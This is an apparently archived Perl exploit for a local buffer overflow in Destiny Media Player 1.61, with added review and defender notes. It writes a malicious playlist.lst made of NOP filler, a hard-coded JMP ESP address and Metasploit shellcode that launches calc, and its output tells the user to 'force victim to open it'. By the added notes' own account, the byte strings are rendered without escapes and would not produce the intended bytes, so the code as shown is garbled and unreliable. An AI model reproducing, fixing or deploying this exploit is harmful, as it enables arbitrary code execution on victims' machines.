
dmp161lst1-overflow.txt

Posted on 05 January 2009

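#!/usr/bin/perl
# Destiny Media Player 1.61 Local BoF Code
# Exploit Coded by : sCORPINo
# Snoop Security Researching Committe
# originally discovered by: Encrypt3d.M!nd
#
# Purpose: builds one long string (filler, a 4-byte address value, filler
# again, then a payload) and writes it to playlist.lst. Per the author's
# notes, Destiny Media Player 1.61 overflows a buffer when it opens the file.
#
# NOTE(review): every byte string below is reproduced exactly as this page
# renders it, i.e. without backslash escapes, so Perl reads "x90" as three
# ASCII characters rather than one byte. Sizes quoted in the author's
# comments describe the intended bytes, not the text as rendered here.
#
# Notes for defenders and analysts:
# - The page names only version 1.61 as affected and gives no fixed version;
#   treat playlist files from untrusted sources as hostile input for it.
# - The generated file is one long run of repeated filler with no line
#   breaks; a playlist would normally consist of short lines, so that shape
#   is a usable triage signal (presumably - confirm against real samples).
# - The return address is hard-coded. The page does not say which module or
#   Windows build it belongs to, so it should not be assumed portable.

use strict;
use warnings;

# windows/exec - 142 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=thread, CMD=calc
# CMD=calc means the payload was generated to start the Windows calculator,
# a visible proof-of-execution marker.
my $shellcode =
    "x6ax1ex59xd9xeexd9x74x24xf4x5bx81x73x13x64" .
    "xfcxb1x5dx83xebxfcxe2xf4x98x14xf5x5dx64xfc" .
    "x3ax18x58x77xcdx58x1cxfdx5exd6x2bxe4x3ax02" .
    "x44xfdx5ax14xefxc8x3ax5cx8axcdx71xc4xc8x78" .
    "x71x29x63x3dx7bx50x65x3ex5axa9x5fxa8x95x59" .
    "x11x19x3ax02x40xfdx5ax3bxefxf0xfaxd6x3bxe0" .
    "xb0xb6xefxe0x3ax5cx8fx75xedx79x60x3fxeex6c" .
    "x92x9cxe7x39xefxbax81xd6x24xf0x3ax2dx78x51" .
    "x3ax35x6cx75x49xdexa4x96xe1x35x8bx32x51x3d" .
    "x0cx64x4fxd7x6axabx4exbax07x9dxddx3ex64xfc" .
    "xb1x5d";

# fill the buffer (the page does not explain how the count was derived)
my $nops = "x90" x 2052;

# fill the buffer more:p
# Declared by the author but never used in the string assembled below.
my $nops2 = "x90" x 100;

# 7CA58265 JMP ESP (author's annotation for the overwritten return address)
my $eip = "x65x82xA5x7c";

# sandwich: filler, address, filler again, payload
my $attack = $nops . $eip . $nops . $shellcode;

# playlist name, change it to anything you want
my $playlist = "playlist.lst";

intro();

# Three-argument open keeps the mode separate from the file name, and both
# open and close are checked so a failed or partial write is reported.
open(my $out_fh, '>', $playlist)
    or die "Cannot open $playlist for writing: $!";
print {$out_fh} $attack;
close($out_fh)
    or die "Cannot close $playlist: $!";

print " $playlist created beside this exploit. ";
print "force victim to open it with Destiny Media Player 1.61 ";
print "good luck ";

# Prints the author's credit banner. The padding that aligned the box was
# collapsed on this page, so each row is printed as rendered.
sub intro {
    print qq(
############################################################
## Snoop Security Researching Committe ##
## www.snoop-security.com ##
## sCORPINo ##
## Destiny Media Player 1.61 Local BoF Code ##
## found by: ##
## http://www.milw0rm.com/exploits/7652 ##
## special tnX to: ##
## Shahriyar, Adel, Alireza, Yashar and all snoop members ##
## just run and open the playlist.lst with ##
## Destiny Media Player.then BOOM ! ##
############################################################
);
    return;
}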

 
